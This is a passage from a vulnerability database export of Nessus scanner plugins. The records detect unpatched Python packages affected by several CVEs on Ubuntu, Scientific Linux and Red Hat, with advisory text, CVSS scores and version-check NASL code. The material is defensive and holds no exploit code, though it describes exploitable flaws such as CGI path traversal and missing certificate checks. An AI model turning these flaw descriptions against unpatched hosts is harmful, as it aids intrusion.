security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-20T15:28:55", "description": "It was discovered that multiple Python protocol libraries incorrectly\nlimited certain data when connecting to servers. A malicious ftp,\nhttp, imap, nntp, pop or smtp server could use this issue to cause a\ndenial of service. (CVE-2013-1752)\n\nIt was discovered that the Python xmlrpc library did not limit\nunpacking gzip-compressed HTTP bodies. A malicious server could use\nthis issue to cause a denial of service. (CVE-2013-1753)\n\nIt was discovered that the Python json module incorrectly handled a\ncertain argument. An attacker could possibly use this issue to read\narbitrary memory and expose sensitive information. This issue only\naffected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. (CVE-2014-4616)\n\nIt was discovered that the Python CGIHTTPServer incorrectly handled\nURL-encoded path separators in URLs. A remote attacker could use this\nissue to expose sensitive information, or possibly execute arbitrary\ncode. This issue only affected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS.\n(CVE-2014-4650)\n\nIt was discovered that Python incorrectly handled sizes and offsets in\nbuffer functions. An attacker could possibly use this issue to read\narbitrary memory and obtain sensitive information. This issue only\naffected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. (CVE-2014-7185).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 17, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2015-06-26T00:00:00", "title": "Ubuntu 12.04 LTS / 14.04 LTS / 14.10 : python2.7, python3.2, python3.4 vulnerabilities (USN-2653-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1753", "CVE-2014-7185", "CVE-2014-4616", "CVE-2013-1752", "CVE-2014-4650"], "modified": "2015-06-26T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:python3.4-minimal", "p-cpe:/a:canonical:ubuntu_linux:python3.4", "p-cpe:/a:canonical:ubuntu_linux:python2.7", "cpe:/o:canonical:ubuntu_linux:14.10", "p-cpe:/a:canonical:ubuntu_linux:python3.2", "cpe:/o:canonical:ubuntu_linux:12.04:-:lts", "p-cpe:/a:canonical:ubuntu_linux:python2.7-minimal", "p-cpe:/a:canonical:ubuntu_linux:python3.2-minimal", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "UBUNTU_USN-2653-1.NASL", "href": "https://www.tenable.com/plugins/nessus/84428", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2653-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(84428);\n script_version(\"2.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2013-1752\", \"CVE-2013-1753\", \"CVE-2014-4616\", \"CVE-2014-4650\", \"CVE-2014-7185\");\n script_bugtraq_id(63804, 66958, 68119, 68147, 70089);\n script_xref(name:\"USN\", value:\"2653-1\");\n\n script_name(english:\"Ubuntu 12.04 LTS / 14.04 LTS / 14.10 : python2.7, python3.2, python3.4 vulnerabilities (USN-2653-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that multiple Python protocol libraries incorrectly\nlimited certain data when connecting to servers. A malicious ftp,\nhttp, imap, nntp, pop or smtp server could use this issue to cause a\ndenial of service. (CVE-2013-1752)\n\nIt was discovered that the Python xmlrpc library did not limit\nunpacking gzip-compressed HTTP bodies. A malicious server could use\nthis issue to cause a denial of service. (CVE-2013-1753)\n\nIt was discovered that the Python json module incorrectly handled a\ncertain argument. An attacker could possibly use this issue to read\narbitrary memory and expose sensitive information. This issue only\naffected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. (CVE-2014-4616)\n\nIt was discovered that the Python CGIHTTPServer incorrectly handled\nURL-encoded path separators in URLs. A remote attacker could use this\nissue to expose sensitive information, or possibly execute arbitrary\ncode. This issue only affected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS.\n(CVE-2014-4650)\n\nIt was discovered that Python incorrectly handled sizes and offsets in\nbuffer functions. An attacker could possibly use this issue to read\narbitrary memory and obtain sensitive information. This issue only\naffected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. (CVE-2014-7185).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/2653-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:python2.7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:python2.7-minimal\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:python3.2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:python3.2-minimal\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:python3.4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:python3.4-minimal\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/10/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/06/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/26\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2015-2021 Canonical, Inc. / NASL script (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(12\\.04|14\\.04|14\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 12.04 / 14.04 / 14.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"12.04\", pkgname:\"python2.7\", pkgver:\"2.7.3-0ubuntu3.8\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"python2.7-minimal\", pkgver:\"2.7.3-0ubuntu3.8\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"python3.2\", pkgver:\"3.2.3-0ubuntu3.7\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"python3.2-minimal\", pkgver:\"3.2.3-0ubuntu3.7\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"python2.7\", pkgver:\"2.7.6-8ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"python2.7-minimal\", pkgver:\"2.7.6-8ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"python3.4\", pkgver:\"3.4.0-2ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"python3.4-minimal\", pkgver:\"3.4.0-2ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"14.10\", pkgname:\"python2.7\", pkgver:\"2.7.8-10ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"14.10\", pkgname:\"python2.7-minimal\", pkgver:\"2.7.8-10ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"14.10\", pkgname:\"python3.4\", pkgver:\"3.4.2-1ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"14.10\", pkgname:\"python3.4-minimal\", pkgver:\"3.4.2-1ubuntu0.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"python2.7 / python2.7-minimal / python3.2 / python3.2-minimal / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-17T13:49:03", "description": "It was discovered that the Python xmlrpclib module did not restrict\nthe size of gzip-compressed HTTP responses. A malicious XMLRPC server\ncould cause an XMLRPC client using xmlrpclib to consume an excessive\namount of memory. (CVE-2013-1753)\n\nIt was discovered that multiple Python standard library modules\nimplementing network protocols (such as httplib or smtplib) failed to\nrestrict the sizes of server responses. A malicious server could cause\na client using one of the affected modules to consume an excessive\namount of memory. (CVE-2013-1752)\n\nIt was discovered that the CGIHTTPServer module incorrectly handled\nURL encoded paths. A remote attacker could use this flaw to execute\nscripts outside of the cgi-bin directory, or disclose the source code\nof the scripts in the cgi-bin directory. (CVE-2014-4650)\n\nAn integer overflow flaw was found in the way the buffer() function\nhandled its offset and size arguments. An attacker able to control\nthese arguments could use this flaw to disclose portions of the\napplication memory or cause it to crash. (CVE-2014-7185)\n\nA flaw was found in the way the json module handled negative index\narguments passed to certain functions (such as raw_decode()). An\nattacker able to control the index value passed to one of the affected\nfunctions could possibly use this flaw to disclose portions of the\napplication memory. (CVE-2014-4616)\n\nThe Python standard library HTTP client modules (such as httplib or\nurllib) did not perform verification of TLS/SSL certificates when\nconnecting to HTTPS servers. A man-in-the-middle attacker could use\nthis flaw to hijack connections and eavesdrop or modify transferred\ndata. (CVE-2014-9365)\n\nThis update also fixes the following bugs :\n\n - Subprocesses used with the Eventlet library or regular\n threads previously tried to close epoll file descriptors\n twice, which led to an 'Invalid argument' error.\n Subprocesses have been fixed to close the file\n descriptors only once.\n\n - When importing the readline module from a Python script,\n Python no longer produces erroneous random characters on\n stdout.\n\n - The cProfile utility has been fixed to print all values\n that the '-s' option supports when this option is used\n without a correct value.\n\n - The load_cert_chain() function now accepts 'None' as a\n keyfile argument.\n\nIn addition, this update adds the following enhancements :\n\n - Security enhancements as described in PEP 466 have been\n backported to the Python standard library, for example,\n new features of the ssl module: Server Name Indication\n (SNI) support, support for new TLSv1.x protocols, new\n hash algorithms in the hashlib module, and many more.\n\n - Support for the ssl.PROTOCOL_TLSv1_2 protocol has been\n added to the ssl library.\n\n - The ssl.SSLSocket.version() method is now available to\n access information about the version of the SSL protocol\n used in a connection.", "edition": 16, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2015-12-22T00:00:00", "title": "Scientific Linux Security Update : python on SL7.x x86_64 (20151119)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1753", "CVE-2014-7185", "CVE-2014-4616", "CVE-2013-1752", "CVE-2014-4650", "CVE-2014-9365"], "modified": "2015-12-22T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:python-test", "p-cpe:/a:fermilab:scientific_linux:python", "p-cpe:/a:fermilab:scientific_linux:python-debuginfo", "p-cpe:/a:fermilab:scientific_linux:python-tools", "p-cpe:/a:fermilab:scientific_linux:python-devel", "p-cpe:/a:fermilab:scientific_linux:python-libs", "x-cpe:/o:fermilab:scientific_linux", "p-cpe:/a:fermilab:scientific_linux:tkinter", "p-cpe:/a:fermilab:scientific_linux:python-debug"], "id": "SL_20151119_PYTHON_ON_SL7_X.NASL", "href": "https://www.tenable.com/plugins/nessus/87570", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(87570);\n script_version(\"2.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2013-1752\", \"CVE-2013-1753\", \"CVE-2014-4616\", \"CVE-2014-4650\", \"CVE-2014-7185\", \"CVE-2014-9365\");\n\n script_name(english:\"Scientific Linux Security Update : python on SL7.x x86_64 (20151119)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that the Python xmlrpclib module did not restrict\nthe size of gzip-compressed HTTP responses. A malicious XMLRPC server\ncould cause an XMLRPC client using xmlrpclib to consume an excessive\namount of memory. (CVE-2013-1753)\n\nIt was discovered that multiple Python standard library modules\nimplementing network protocols (such as httplib or smtplib) failed to\nrestrict the sizes of server responses. A malicious server could cause\na client using one of the affected modules to consume an excessive\namount of memory. (CVE-2013-1752)\n\nIt was discovered that the CGIHTTPServer module incorrectly handled\nURL encoded paths. A remote attacker could use this flaw to execute\nscripts outside of the cgi-bin directory, or disclose the source code\nof the scripts in the cgi-bin directory. (CVE-2014-4650)\n\nAn integer overflow flaw was found in the way the buffer() function\nhandled its offset and size arguments. An attacker able to control\nthese arguments could use this flaw to disclose portions of the\napplication memory or cause it to crash. (CVE-2014-7185)\n\nA flaw was found in the way the json module handled negative index\narguments passed to certain functions (such as raw_decode()). An\nattacker able to control the index value passed to one of the affected\nfunctions could possibly use this flaw to disclose portions of the\napplication memory. (CVE-2014-4616)\n\nThe Python standard library HTTP client modules (such as httplib or\nurllib) did not perform verification of TLS/SSL certificates when\nconnecting to HTTPS servers. A man-in-the-middle attacker could use\nthis flaw to hijack connections and eavesdrop or modify transferred\ndata. (CVE-2014-9365)\n\nThis update also fixes the following bugs :\n\n - Subprocesses used with the Eventlet library or regular\n threads previously tried to close epoll file descriptors\n twice, which led to an 'Invalid argument' error.\n Subprocesses have been fixed to close the file\n descriptors only once.\n\n - When importing the readline module from a Python script,\n Python no longer produces erroneous random characters on\n stdout.\n\n - The cProfile utility has been fixed to print all values\n that the '-s' option supports when this option is used\n without a correct value.\n\n - The load_cert_chain() function now accepts 'None' as a\n keyfile argument.\n\nIn addition, this update adds the following enhancements :\n\n - Security enhancements as described in PEP 466 have been\n backported to the Python standard library, for example,\n new features of the ssl module: Server Name Indication\n (SNI) support, support for new TLSv1.x protocols, new\n hash algorithms in the hashlib module, and many more.\n\n - Support for the ssl.PROTOCOL_TLSv1_2 protocol has been\n added to the ssl library.\n\n - The ssl.SSLSocket.version() method is now available to\n access information about the version of the SSL protocol\n used in a connection.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1512&L=scientific-linux-errata&F=&S=&P=10966\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?d3f33a7f\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:python-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:python-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:python-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:python-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:python-test\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:python-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:tkinter\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/10/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/11/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/12/22\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 7.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"python-2.7.5-34.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"python-debug-2.7.5-34.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"python-debuginfo-2.7.5-34.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"python-devel-2.7.5-34.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"python-libs-2.7.5-34.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"python-test-2.7.5-34.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"python-tools-2.7.5-34.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"tkinter-2.7.5-34.el7\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"python / python-debug / python-debuginfo / python-devel / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-09-14T17:40:44", "description": "Updated python packages that fix multiple security issues, several\nbugs, and add various enhancements are now available for Red Hat\nEnterprise Linux 7.\n\nRed Hat Product Security has rated this update as having Moderate\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nPython is an interpreted, interactive, object-oriented programming\nlanguage often compared to Tcl, Perl, Scheme, or Java. Python includes\nmodules, classes, exceptions, very high level dynamic data types and\ndynamic typing. Python supports interfaces to many system calls and\nlibraries, as well as to various windowing systems (X11, Motif, Tk,\nMac and MFC).\n\nIt was discovered that the Python xmlrpclib module did not restrict\nthe size of gzip-compressed HTTP responses. A malicious XMLRPC server\ncould cause an XMLRPC client using xmlrpclib to consume an excessive\namount of memory. (CVE-2013-1753)\n\nIt was discovered that multiple Python standard library modules\nimplementing network protocols (such as httplib or smtplib) failed to\nrestrict the sizes of server responses. A malicious server could cause\na client using one of the affected modules to consume an excessive\namount of memory. (CVE-2013-1752)\n\nIt was discovered that the CGIHTTPServer module incorrectly handled\nURL encoded paths. A remote attacker could use this flaw to execute\nscripts outside of the cgi-bin directory, or disclose the source code\nof the scripts in the cgi-bin directory. (CVE-2014-4650)\n\nAn integer overflow flaw was found in the way the buffer() function\nhandled its offset and size arguments. An attacker able to control\nthese arguments could use this flaw to disclose portions of the\napplication memory or cause it to crash. (CVE-2014-7185)\n\nA flaw was found in the way the json module handled negative index\narguments passed to certain functions (such as raw_decode()). An\nattacker able to control the index value passed to one of the affected\nfunctions could possibly use this flaw to disclose portions of the\napplication memory. (CVE-2014-4616)\n\nThe Python standard library HTTP client modules (such as httplib or\nurllib) did not perform verification of TLS/SSL certificates when\nconnecting to HTTPS servers. A man-in-the-middle attacker could use\nthis flaw to hijack connections and eavesdrop or modify transferred\ndata. (CVE-2014-9365)\n\nNote: The Python standard library was updated to make it possible to\nenable certificate verification by default. However, for backwards\ncompatibility, verification remains disabled by default. Future\nupdates may change this default. Refer to the Knowledgebase article\n2039753 linked to in the References section for further details about\nthis change. (BZ#1219108)\n\nThis update also fixes the following bugs :\n\n* Subprocesses used with the Eventlet library or regular threads\npreviously tried to close epoll file descriptors twice, which led to\nan 'Invalid argument' error. Subprocesses have been fixed to close the\nfile descriptors only once. (BZ#1103452)\n\n* When importing the readline module from a Python script, Python no\nlonger produces erroneous random characters on stdout. (BZ#1189301)\n\n* The cProfile utility has been fixed to print all values that the\n'-s' option supports when this option is used without a correct value.\n(BZ#1237107)\n\n* The load_cert_chain() function now accepts 'None' as a keyfile\nargument. (BZ#1250611)\n\nIn addition, this update adds the following enhancements :\n\n* Security enhancements as described in PEP 466 have been backported\nto the Python standard library, for example, new features of the ssl\nmodule: Server Name Indication (SNI) support, support for new TLSv1.x\nprotocols, new hash algorithms in the hashlib module, and many more.\n(BZ#1111461)\n\n* Support for the ssl.PROTOCOL_TLSv1_2 protocol has been added to the\nssl library. (BZ#1192015)\n\n* The ssl.SSLSocket.version() method is now available to access\ninformation about the version of the SSL protocol used in a\nconnection. (BZ#1259421)\n\nAll python users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues and add these\nenhancements.", "edition": 19, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2015-11-20T00:00:00", "title": "RHEL 7 : python (RHSA-2015:2101)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1753", "CVE-2014-7185", "CVE-2014-4616", "CVE-2013-1752", "CVE-2014-4650", "CVE-2014-9365"], "modified": "2015-11-20T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:python-tools", "cpe:/o:redhat:enterprise_linux:7.4", "p-cpe:/a:redhat:enterprise_linux:python", "cpe:/o:redhat:enterprise_linux:7.7", "p-cpe:/a:redhat:enterprise_linux:python-devel", "cpe:/o:redhat:enterprise_linux:7.5", "p-cpe:/a:redhat:enterprise_linux:tkinter", "cpe:/o:redhat:enterprise_linux:7", "cpe:/o:redhat:enterprise_linux:7.3", "p-cpe:/a:redhat:enterprise_linux:python-debuginfo", "cpe:/o:redhat:enterprise_linux:7.2", "p-cpe:/a:redhat:enterprise_linux:python-test", "p-cpe:/a:redhat:enterprise_linux:python-debug", "cpe:/o:redhat:enterprise_linux:7.6", "p-cpe:/a:redhat:enterprise_linux:python-libs"], "id": "REDHAT-RHSA-2015-2101.NASL", "href": "https://www.tenable.com/plugins/nessus/86968", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:2101. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(86968);\n script_version(\"2.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/02/27\");\n\n script_cve_id(\"CVE-2013-1752\", \"CVE-2013-1753\", \"CVE-2014-4616\", \"CVE-2014-4650\", \"CVE-2014-7185\");\n script_xref(name:\"RHSA\", value:\"2015:2101\");\n\n script_name(english:\"RHEL 7 : python (RHSA-2015:2101)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated python packages that fix multiple security issues, several\nbugs, and add various enhancements are now available for Red Hat\nEnterprise Linux 7.\n\nRed Hat Product Security has rated this update as having Moderate\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nPython is an interpreted, interactive, object-oriented programming\nlanguage often compared to Tcl, Perl, Scheme, or Java. Python includes\nmodules, classes, exceptions, very high level dynamic data types and\ndynamic typing. Python supports interfaces to many system calls and\nlibraries, as well as to various windowing systems (X11, Motif, Tk,\nMac and MFC).\n\nIt was discovered that the Python xmlrpclib module did not restrict\nthe size of gzip-compressed HTTP responses. A malicious XMLRPC server\ncould cause an XMLRPC client using xmlrpclib to consume an excessive\namount of memory. (CVE-2013-1753)\n\nIt was discovered that multiple Python standard library modules\nimplementing network protocols (such as httplib or smtplib) failed to\nrestrict the sizes of server responses. A malicious server could cause\na client using one of the affected modules to consume an excessive\namount of memory. (CVE-2013-1752)\n\nIt was discovered that the CGIHTTPServer module incorrectly handled\nURL encoded paths. A remote attacker could use this flaw to execute\nscripts outside of the cgi-bin directory, or disclose the source code\nof the scripts in the cgi-bin directory. (CVE-2014-4650)\n\nAn integer overflow flaw was found in the way the buffer() function\nhandled its offset and size arguments. An attacker able to control\nthese arguments could use this flaw to disclose portions of the\napplication memory or cause it to crash. (CVE-2014-7185)\n\nA flaw was found in the way the json module handled negative index\narguments passed to certain functions (such as raw_decode()). An\nattacker able to control the index value passed to one of the affected\nfunctions could possibly use this flaw to disclose portions of the\napplication memory. (CVE-2014-4616)\n\nThe Python standard library HTTP client modules (such as httplib or\nurllib) did not perform verification of TLS/SSL certificates when\nconnecting to HTTPS servers. A man-in-the-middle attacker could use\nthis flaw to hijack connections and eavesdrop or modify transferred\ndata. (CVE-2014-9365)\n\nNote: The Python standard library was updated to make it possible to\nenable certificate verification by default. However, for backwards\ncompatibility, verification remains disabled by default. Future\nupdates may change this default. Refer to the Knowledgebase article\n2039753 linked to in the References section for further details about\nthis change. (BZ#1219108)\n\nThis update also fixes the following bugs :\n\n* Subprocesses used with the Eventlet library or regular threads\npreviously tried to close epoll file descriptors twice, which led to\nan 'Invalid argument' error. Subprocesses have been fixed to close the\nfile descriptors only once. (BZ#1103452)\n\n* When importing the readline module from a Python script, Python no\nlonger produces erroneous random characters on stdout. (BZ#1189301)\n\n* The cProfile utility has been fixed to print all values that the\n'-s' option supports when this option is used without a correct value.\n(BZ#1237107)\n\n* The load_cert_chain() function now accepts 'None' as a keyfile\nargument. (BZ#1250611)\n\nIn addition, this update adds the 